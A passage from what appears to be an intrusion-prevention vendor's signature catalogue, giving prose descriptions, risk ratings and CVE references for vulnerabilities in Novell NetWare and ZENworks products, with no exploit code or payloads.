A code execution vulnerability exists in Novell Netware. The vulnerability is due to a stack buffer overflow in NWFTPD.NLM when processing DELE FTP requests. Remote authenticated attackers can exploit this vulnerability by sending maliciously crafted commands to the affected server. In attack scenarios where code execution is successful the behaviour of the affected server depends entirely on the logic of the injected code, which will be executed within the security context of the affected service. In situations where code execution is not successful the affected service may terminate abnormally, causing a denial of service condition.

Situation:

FTP_CS-Novell-NetWare-FTP-Server-Dele-Command-Stack-Buffer-Overflow

References:

CVE-2010-4228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4228

BID-46922
http://www.securityfocus.com/bid/46922

Novell-NetWare-FTP-Server-Mkd-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell NetWare

Risk:

High

First detected in:

sgpkg-ips-299-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Novell NetWare

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell Netware. The vulnerability is due to a boundary error in NWFTPD.nlm when processing the MKD and RMD FTP commands. Remote authenticated attackers can exploit this vulnerability by sending maliciously crafted commands to the affected server. In successfulattack scenarios, the behavior of the affected server depends on the intention of the injected code, which is executed in the security context of the affected service.

Situation:

FTP_CS-Novell-NetWare-FTP-Server-Mkd-Buffer-Overflow

References:

CVE-2010-0625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0625

BID-39041
http://www.securityfocus.com/bid/39041

Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow

About this vulnerability:

Buffer overflow vulnerability in Novell NetWare NFS Portmapper daemon

Risk:

High

First detected in:

sgpkg-ips-256-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Novell NetWare

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell NetWare NFS Portmapper daemon due to a boundary error when handling RPC calls. An unauthenticated attacker can exploit this vulnerability by sending a crafted CALLIT RPC call to execute arbitrary code with the privileges of the vulnerable daemon process or to terminate the affected daemon process, and potentially crash the system.

Situation:

Generic_UDP-Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow
SunRPC_TCP-Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow

References:

BID-36564
http://www.securityfocus.com/bid/36564

OSVDB-58447
http://www.osvdb.org/58447

Novell-NetWare-OpenSSH-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell Netware

Risk:

High

First detected in:

sgpkg-ips-672-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Novell NetWare

Software:

<os>

Type:

Buffer Overflow

Description:

A buffer stack-based overflow vulnerability exists in Novell Netware. The vulnerability is due to a boundary error in SSHD.NLM and SFTP-SVR.NLM modules when processing user sessions. Remote authenticated attackers can exploit this vulnerability to inject and execute arbitrary code with admin privileges via sending an overly long string argument to the affected service. In attack scenarios where code execution is successful the behaviour of the affected server depends entirely on the intention of the injected code. In situations where code execution is not successful the affected service may terminate abnormally, causing a denial of service condition.

Situation:

SSH_Novell-NetWare-OpenSSH-Buffer-Overflow

References:

BID-42875
http://www.securityfocus.com/bid/42875

Novell-NetWare-Xnfs.nlm-Caller-Name-Xdrdecodestring-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell Netware

Risk:

Moderate

First detected in:

sgpkg-ips-437-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Novell NetWare

Software:

<os>

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Novell Netware. The vulnerability is due to trusting an XDR-encoded caller_name length value within an NLM_TEST request. A malicious length value can lead to a stack buffer overflow. The flaw exists within the XNFS.NLM component. A remote unauthenticated attacker can exploit this vulnerability by sending malicious NFS RPC NLM_TEST requests. In a successful attack scenario, the attacker can execute arbitrary code within the context of the system. In an unsuccessful attack the NFS service may crash resulting in a Denial of Service condition.

Situation:

Generic_UDP-Novell-NetWare-Xnfs-Caller-Name-Xdrdecodestring-Heap-Buffer-Overflow

References:

CVE-2011-4191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4191

OSVDB-77316
http://www.osvdb.org/77316

Novell-NetWare-Xnfs.nlm-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell Netware

Risk:

High

First detected in:

sgpkg-ips-381-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Novell NetWare

Software:

<os>

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Novell Netware product. The vulnerability is due to insufficient boundary check in xdrDecodeString() while processing NFS RPC requests. The vulnerable daemon explicitly trusts a length field when receiving data which is later copied into a stack buffer, potentially resulting in a stack overflow. The flaw exists within the XNFS.NLM component. A remote unauthenticated attacker can exploit this vulnerability by sending malicious NFS RPC requests. In a successful attack scenario, the attacker can execute arbitrary code within the context of the root user. In an unsuccessful attack the NFS services becomes unresponsive.

Situation:

Generic_UDP-Novell-NetWare-Xnfs.nlm-Stack-Buffer-Overflow

References:

CVE-2010-4227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4227

BID-46535
http://www.securityfocus.com/bid/46535

Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell Netware

Risk:

Moderate

First detected in:

sgpkg-ips-429-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Novell NetWare

Software:

<os>

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Novell Netware. The vulnerability is due to an insufficient boundary check in xdrDecodeString() while processing certain RPC calls, potentially resulting in a heap buffer overflow. The flaw exists within the XNFS.NLM component. A remote unauthenticated attacker can exploit this vulnerability by sending malicious NFS RPC requests. In a successful attack scenario, the attacker can execute arbitrary code within the context of the system. In an unsuccessful attack the NFS services becomes unresponsive.

Situation:

Generic_UDP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow
SunRPC_TCP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow

References:

CVE-2011-4191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4191

BID-50804
http://www.securityfocus.com/bid/50804

OSVDB-77316
http://www.osvdb.org/77316

Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow-2

About this vulnerability:

A vulnerability in Novell Netware

Risk:

Moderate

First detected in:

sgpkg-ips-429-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Novell NetWare

Software:

<os>

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Novell Netware. The vulnerability is due to the trusting of a length value in xdrDecodeString() function while processing certain RPC calls, potentially resulting in a heap buffer overflow. The flaw exists within the XNFS.NLM component. A remote unauthenticated attacker can exploit this vulnerability by sending malicious NFS RPC requests. In a successful attack scenario, the attacker can execute arbitrary code within the context of the system. In an unsuccessful attack the target server may become unresponsive.

Situation:

Generic_UDP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow-2

References:

CVE-2011-4191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4191

BID-50804
http://www.securityfocus.com/bid/50804

OSVDB-77316
http://www.osvdb.org/77316

Novell-Remote-Manager-Off-By-One-Denial-Of-Service

About this vulnerability:

A vulnerability in Novell Remote Manager

Risk:

High

First detected in:

sgpkg-ips-471-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Novell Remote Manager

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in Novell Remote Manager. The vulnerability is due to insufficient validation of the HTTP Host header values. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously HTTP request that contains crafted Host header to the vulnerable service. Successful exploitation of this vulnerability would lead to a denial-of-service condition.

Situation:

HTTP_CSH-Novell-Remote-Manager-Off-By-One-Denial-Of-Service

References:

OSVDB-84444
http://www.osvdb.org/84444

Novell-Sentinel-Log-Manager-Retention-Policy-Security-Restriction-Bypass

About this vulnerability:

A vulnerability in Novell Sentinel Log Manager

Risk:

High

First detected in:

sgpkg-ips-492-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell Sentinel Log Manager

Type:

Malfunction

Description:

A policy bypass vulnerability exists in Novell Sentinel Log Manager. The vulnerability is due to insufficient validation of incoming requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the affected system. This can result in the creation of unauthorized data retention policies.

Situation:

HTTP_CS-Novell-Sentinel-Log-Manager-Retention-Policy-Security-Restriction-Bypass

References:

OSVDB-85955
http://www.osvdb.org/85955

Novell-Service-Desk-Clientimportuploadform-Directory-Traversal

About this vulnerability:

A vulnerability in Novell Service Desk

Risk:

Moderate

First detected in:

sgpkg-ips-756-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell Service Desk

Type:

Input Validation

Description:

The filename of uploaded files is improperly validated in the clientImportUploadForm form. This causes a vulnerability which can allow an attacker to run arbitrarry code on the target system.

Situation:

HTTP_CS-Novell-Service-Desk-Clientimportuploadform-Directory-Traversal

References:

CVE-2016-1593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1593

Novell-Teaming-Ajaxuploadimagefile-Remote-Code-Execution

About this vulnerability:

A vulnerability in Novell Teaming

Risk:

High

First detected in:

sgpkg-ips-381-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell Teaming

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Novell Teaming. The flaw is due to an input validation when parsing image uploads. A remote attacker could exploit this vulnerability by uploading a maliciously crafted file. Successful exploitation would result in arbitrary files of any type (such as .bat, .exe., .jsp) uploaded to any directory on a target system, including startup folders and the Novell Teaming website. The behaviour of the affected host depends entirely on the intention of the attacker-controlled file.

Situation:

HTTP_CS-Novell-Teaming-Ajaxuploadimagefile-Remote-Code-Execution

References:

CVE-2010-2773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2773

BID-41795
http://www.securityfocus.com/bid/41795

Novell-ZENworks-Asset-Management-Directory-Traversal

About this vulnerability:

An attempt to exploit a vulnerability in Novell ZENworks Asset Management detected

Risk:

High

First detected in:

sgpkg-ips-655-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell ZENworks Asset Management

Type:

Directory Traversal

Description:

A Buffer Overflow vulnerability in Novell ZENworks Asset Management 7.5 which allows remote attackers to execute arbitrary code by uploading an executable file.

Situation:

HTTP_CS-Novell-ZENworks-Asset-Management-Directory-Traversal

References:

CVE-2011-2653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2653

BID-50966
http://www.securityfocus.com/bid/50966

OSVDB-77583
http://www.osvdb.org/77583

Novell-ZENworks-Asset-Management-File-Upload-Directory-Traversal

About this vulnerability:

An attempt to exploit a vulnerability in Novell ZENworks

Risk:

High

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Input Validation

Description:

Situation:

HTTP_CSU-Novell-ZENworks-Asset-Management-File-Upload-Directory-Traversal

References:

CVE-2010-4229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4229

BID-47295
http://www.securityfocus.com/bid/47295

OSVDB-71872
http://www.osvdb.org/71872

Novell-ZENworks-Asset-Management-Web-Console-Information-Disclosure

About this vulnerability:

A vulnerability in Novell ZENworks Asset Management

Risk:

High

First detected in:

sgpkg-ips-487-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Asset Management

Type:

Malfunction

Description:

An information disclosure vulnerability exists in Novell ZENworks Asset Management. The vulnerability is due to hard coded credentials in the GetFile_Password and GetConfigInfo_Password functions. These functions allow access to the file system and system configuration parameters. A remote unauthenticated attacker could exploit this vulnerability by invoking these functions. Successful exploitation could allow access to the file system with SYSTEM privileges.

Situation:

HTTP_CRL-Novell-ZENworks-Asset-Management-Web-Console-Information-Disclosure

References:

CVE-2012-4933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4933

Novell-ZENworks-Configuration-Management-Directory-Traversal

About this vulnerability:

A Novell ZENworks Configuration Management Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Directory Traversal

Description:

A directory traversal vulnerability in Novell ZENworks Configuration Management, versions 11.1 and 11.1a, in the Preboot Service, which allows remote attackers to read arbitrary files via an opcode 0x21 request.

Situation:

Generic_CS-Novell-ZENworks-Configuration-Management-Directory-Traversal

References:

CVE-2012-2215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2215

OSVDB-80230
http://www.osvdb.org/80230

Novell-ZENworks-Configuration-Management-DirectoryViewer-Information-Disclosure

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

Moderate

First detected in:

sgpkg-ips-650-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Directory Traversal

Description:

An information disclosure vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to lack of sanitization of the dirname parameter within the DirectoryViewer class. By sending crafted requests to the target server, a remote attacker can leverage this vulnerability to disclose directory contents from the server.

Situation:

HTTP_CRL-Novell-ZENworks-Configuration-Management-DirectoryViewer-Information-Disclosure

References:

CVE-2015-0785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0785

Novell-ZENworks-Configuration-Management-File-Upload

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

Moderate

First detected in:

sgpkg-ips-521-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Input Validation

Description:

There is a file upload vulnerability in Novel ZENworks Configuration Management. This vulnerability is caused by insufficient authentication and a directory traversal in the Control Center module that allows arbitrary file uploads. Remote, unauthenticated attackers could exploit this vulnerability by sending crafted packets to the affected service. Successful exploitation would allow the attacker to execute arbitrary code on the machine running the vulnerable service with administrative privileges.

Situation:

HTTP_CS-Novell-ZENworks-Configuration-Management-File-Upload

References:

CVE-2013-1080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1080

OSVDB-91627
http://www.osvdb.org/91627

Novell-ZENworks-Configuration-Management-FileViewer-Information-Disclosure

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

Moderate

First detected in:

sgpkg-ips-650-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Directory Traversal

Description:

An information disclosure vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to lack of sanitization on the filename parameter within the FileViewer class. By sending crafted requests to the target server, a remote attacker can leverage this vulnerability to disclose arbitrary file contents from the server.

Situation:

HTTP_CRL-Novell-ZENworks-Configuration-Management-FileViewer-Information-Disclosure

References:

CVE-2015-0783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0783

Novell-ZENworks-Configuration-Management-Getstoredresult-SQL-Injection

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

Moderate

First detected in:

sgpkg-ips-644-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Input Validation

Description:

An SQL injection vulnerability exists in ZENworks Configuration Management. The vulnerability is due to insufficient sanitization of the input parameter in the GetReRequestData method of the GetStoredResult class before it is used in an SQL query. A remote attacker can exploit this vulnerability by sending a crafted message to a target server, execute arbitrary SQL code, and access sensitive information.

Situation:

HTTP_CRL-Novell-ZENworks-Configuration-Management-Getstoredresult-SQL-Injection

References:

CVE-2015-0780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0780

Novell-ZENworks-Configuration-Management-Preboot-Directory-Traversal

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

High

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Novell ZENworks Configuration Manager in its PreBoot service, novell-pbserv.exe. The vulnerability is because the preboot service listening on port 998/TCP supports an opcode that allows files to be downloaded through directory traversal, without sanitizing paths that include "..". A remote unauthenticated attacker can exploit this vulnerability to disclose the contents of arbitrary files on a vulnerable system.

Situation:

Generic_CS-Novell-ZENworks-Configuration-Management-Preboot-Directory-Traversal

References:

CVE-2013-3706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3706

BID-65912
http://www.securityfocus.com/bid/65912

OSVDB-104002
http://www.osvdb.org/104002

Novell-ZENworks-Configuration-Management-Preboot-Policy-Service-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

High

First detected in:

sgpkg-ips-654-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in the PreBoot Policy Service of Novell ZENworks Configuration Management. The vulnerability is due to a boundary error in the logging functionality. Remote, unauthenticated attackers could exploit this vulnerability by sending crafted packets to the affected service. Successful exploitation would allow the attacker to execute arbitrary code on the machine running the vulnerable service with System privileges.

Situation:

Generic_UDP-Novell-ZENworks-Configuration-Management-Preboot-Policy-Service-Buffer-Overflow

References:

CVE-2015-0786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0786

Novell-ZENworks-Configuration-Management-Preboot-Service-Code-Execution

About this vulnerability:

A buffer overflow vulnerability in Novell ZENworks Configuration Management

Risk:

High

First detected in:

sgpkg-ips-313-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Novell ZENworks Desktop/Server Management

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell ZENworks Configuration Management. A remote attacker can exploit this vulnerability by sending a crafted request containing an overly large data section to the target server to execute arbitrary code with the SYSTEM privileges.

Situation:

Generic_CS-Novell-ZENworks-Preboot-Service-Code-Execution

References:

BID-39111
http://www.securityfocus.com/bid/39111

Novell-ZENworks-Configuration-Management-Rtrlet-Directory-Traversal

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to insufficient input validation within the ZENworks Server's Rtrlet.class. Remote unauthenticated attackers can leverage this vulnerability to upload malicious files anywhere onto the target server. Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the vulnerable system with administrative privileges.

Situation:

HTTP_CS-Novell-ZENworks-Configuration-Management-Rtrlet-Directory-Traversal

References:

CVE-2015-0781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0781

OSVDB-121154
http://www.osvdb.org/121154

Novell-ZENworks-Configuration-Management-Schedule.schedulequery-SQL-Injection

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

High

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Input Validation

Description:

An SQL injection vulnerability exists in ZENworks Configuration Management. The vulnerability is due to insufficient sanitization of a request parameter in the run method of the ScheduleQuery class before using the parameter in SQL queries. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted message to a target server to execute arbitrary SQL code.

Situation:

HTTP_CRL-Novell-ZENworks-Configuration-Management-Schedule.schedulequery-SQL-Injection

References:

CVE-2015-0782
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0782

Novell-ZENworks-Configuration-Management-Session-Id-Information-Disclosure

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

High

First detected in:

sgpkg-ips-649-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Malfunction

Description:

An information disclosure vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to exposure of insecure functionality within Rtrlet.class. By sending crafted requests to the target server, a remote unauthenticated attacker can leverage this vulnerability to disclosure Session IDs of the logged in users which can be used to used to facilitate further attacks.

Situation:

HTTP_CRL-Novell-ZENworks-Configuration-Management-Session-Id-Information-Disclosure

References:

CVE-2015-0784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0784

Novell-ZENworks-Configuration-Management-Umaninv-Information-Disclosure

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

Moderate

First detected in:

sgpkg-ips-549-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Directory Traversal

Description:

There is an information disclosure vulnerability in Novel ZENworks Configuration Management. The vulnerability is due to a failure to validate the "Filename" GET parameter to the umaninv service leading to directory traversal. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to affected service. Successful exploitation would allow the attacker to disclose contents of arbitrary files.

Situation:

HTTP_CSU-Novell-ZENworks-Configuration-Management-Umaninv-Information-Disclosure

References:

CVE-2013-1084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1084

OSVDB-99198
http://www.osvdb.org/99198

Novell-ZENworks-Configuration-Management-Uploadservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

High

First detected in:

sgpkg-ips-643-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to insufficient input validation within the ZENworks Server's UploadServlet. Remote unauthenticated attackers can leverage this vulnerability to upload malicious files anywhere onto the target server. Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the vulnerable system with administrative privileges.

Situation:

HTTP_CRL-Novell-ZENworks-Configuration-Management-Uploadservlet-Directory-Traversal

References:

CVE-2015-0779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0779

Novell-ZENworks-Configuration-Management-Uploadservlet-Remote-Code-Execution

About this vulnerability:	A vulnerability in Novell ZENworks Configuration Management
Risk:	Moderate
First detected in:	sgpkg-ips-414-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Novell ZENworks Configuration Management
Type:	Input Validation
Description:	A remote code execution vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to insufficient input validation within the ZENworks Server's UploadServlet. Remote unauthenticated attackers can leverage this vulnerability to upload malicious files anywhere onto the target server. Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the vulnerable system with the privileges of the Administrator user. In this case, the behaviour of the target machine is dependent on the intention of the malicious code.
Situation:	HTTP_CRL-Novell-ZENworks-Configuration-Management-Uploadservlet-RCE

Novell-ZENworks-Desktop-Management-On-Linux-Tftpd-Code-Execution

About this vulnerability:

A vulnerability in Novell ZENworks Desktop Management on Linux

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Novell ZENworks Desktop Management

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Novell ZENworks Desktop Management on Linux. Specifically, the vulnerability is due to a boundary error in the TFTPD server component which listens by default on UDP port 69. When handling UDP packets, the process copies user supplied data into a fixed size stack buffer. This would cause the buffer to overrun if overly long data is provided. Attackers may leverage this to carry out code injection and execution attacks. Remote attackers may exploit this vulnerability by sending a specially crafted request to the affected service. Successful attacks would lead to execution of arbitrary code on the target host in the context of the TFTPD process, normally root.

Situation:

TFTP_CS-Novell-ZENworks-Desktop-Management-On-Linux-Tftpd-Code-Execution

References:

BID-45378
http://www.securityfocus.com/bid/45378

Novell-ZENworks-Handheld-Management-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell ZENworks Handheld Management

Risk:

High

First detected in:

sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Handheld Management

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Novell ZENworks Handheld Management. The vulnerability is due to an error in the IP Conduit service while parsing the client messages with a malicious opcode and string size value. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted packet to the affected server. Successful exploitation would allow the attacker to execute arbitrary code on the server with the privileges of the service, by default SYSTEM.

Situation:

Generic_CS-Novell-ZENworks-Handheld-Management-Buffer-Overflow

References:

BID-46024
http://www.securityfocus.com/bid/46024

Novell-ZENworks-Handheld-Management-Upload-Directory-Traversal

About this vulnerability:

A vulnerability in Novell ZENworks Handheld Management

Risk:

Moderate

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Handheld Management

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Novell ZENworks Handheld Management. The vulnerability occurs during a file upload operation, which can lead to an arbitrary file upload, and later command execution.

Situation:

Generic_CS-Novell-ZENworks-Handheld-Management-Upload-Directory-Traversal

References:

BID-48467
http://www.securityfocus.com/bid/48467

Novell-ZENworks-Handheld-Management-Zfhipcnd.exe-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell ZENworks Handheld Management

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell ZENworks Handheld Management

Type:

Buffer Overflow

Description:

A vulnerability exists in Novell ZENworks Handheld Management that could be exploited by remote attackers to execute code on a vulnerable system. The vulnerability is due to an error in the IP Conduit service of the Novell ZENworks Handheld Management. Remote attackers could exploit this vulnerability by sending a crafted packet to the affected server. Successful exploitation would cause a heap-based buffer overflow in ZENworks Handheld Management. This could allow the attacker to execute arbitrary code on the server with system privileges.

Situation:

Generic_CS-Novell-ZENworks-Handheld-Management-Zfhipcnd.exe-Buffer-Overflow

References:

CVE-2010-4299
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4299

BID-44700
http://www.securityfocus.com/bid/44700

Novell-ZENworks-Launchhelp.dll-ActiveX-LaunchProcess-Code-Execution

About this vulnerability:

A vulnerability in Novell ZENworks AdminStudio and Configuration Management

Risk:

Moderate

First detected in:

sgpkg-ips-423-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks AdminStudio; Novell ZENworks Configuration Management

Type:

Malfunction

Description:

A vulnerability exists in Novell ZENworks. Specifically, the vulnerability is due to an access control weakness in the ActiveX Control LaunchHelp.HelpLauncher when handling the LaunchProcess() method. A remote attacker can exploit the vulnerability by enticing a user to open a specially crafted web page. Successful exploitation can result in arbitrary code execution in the context of the currently logged-in user.

Situation:

File-Text_Novell-ZENworks-Launchhelp.dll-ActiveX-LaunchProcess-Code-Execution

References:

CVE-2011-2657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2657

BID-50274
http://www.securityfocus.com/bid/50274

Novell-ZENworks-Mobile-Management-Cross-Site-Scripting

About this vulnerability:	A vulnerability in Novell ZENworks Mobile Management
Risk:	High
First detected in:	sgpkg-ips-681-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Novell ZENworks Mobile Management
Type:	Input Validation
Description:	There exists a cross-site scripting vulnerability in Novell ZENworks Mobile Management. A remote attacker can use the vulnerability to execute arbitrary script code.
Situation:	HTTP_CRL-Novell-ZENworks-Mobile-Management-Cross-Site-Scripting

Novell-ZENworks-Mobile-Management-Dusap.php-Code-Execution

About this vulnerability:

A vulnerability in Novell ZENworks Mobile Management

Risk:

High

First detected in:

sgpkg-ips-527-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Mobile Management

Type:

Directory Traversal

Description:

A code execution vulnerability has been reported in Novell's ZENworks Mobile Management system. The vulnerability is due to insufficient validation of the language parameter while being processed by DUSAP.php. An attacker can exploit this vulnerability by using directory traversal characters as part of the language parameter to cause code execution.

Situation:

HTTP_CRL-Novell-ZENworks-Mobile-Management-Dusap.php-Code-Execution

References:

CVE-2013-1082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1082

BID-60179
http://www.securityfocus.com/bid/60179

OSVDB-91118
http://www.osvdb.org/91118

Novell-ZENworks-Mobile-Management-Mdm.php-Code-Execution

About this vulnerability:

A vulnerability in Novell ZENworks Mobile Management

Risk:

High

First detected in:

sgpkg-ips-527-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Mobile Management

Type:

Directory Traversal

Description:

A code execution vulnerability has been reported in ZENworks' Mobile Management system. The vulnerability is due to insufficient validation of the language parameter while being processed by MDM.php. An attacker can exploit this vulnerability by using directory traversal characters as part of the language parameter to cause code execution.

Situation:

HTTP_CRL-Novell-ZENworks-Mobile-Management-Mdm.php-Code-Execution

References:

CVE-2013-1081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1081

BID-58402
http://www.securityfocus.com/bid/58402

OSVDB-91119
http://www.osvdb.org/91119

Novell-ZENworks-Patch-Management-Multiple-SQL-Injection-Vulnerabilities

About this vulnerability:

A vulnerability in Novell ZENworks

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Patch Management

Type:

Malfunction

Description:

There are several user input validation vulnerabilities in the Novell ZENworks Patch Management product. After authentication, a malicious user can submit crafted HTTP request to the affected product to exploit the flaws. The attacker may inject and execute arbitrary SQL commands on the vulnerable host. The target behaviour is dependent on the nature and purpose of the injected SQL statements. The target may show no abnormal behaviour under attack.

Situation:

HTTP_CSU-Novell-ZENworks-Patch-Management-Multiple-SQL-Injection-Vulnerabilities

References:

CVE-2005-3315
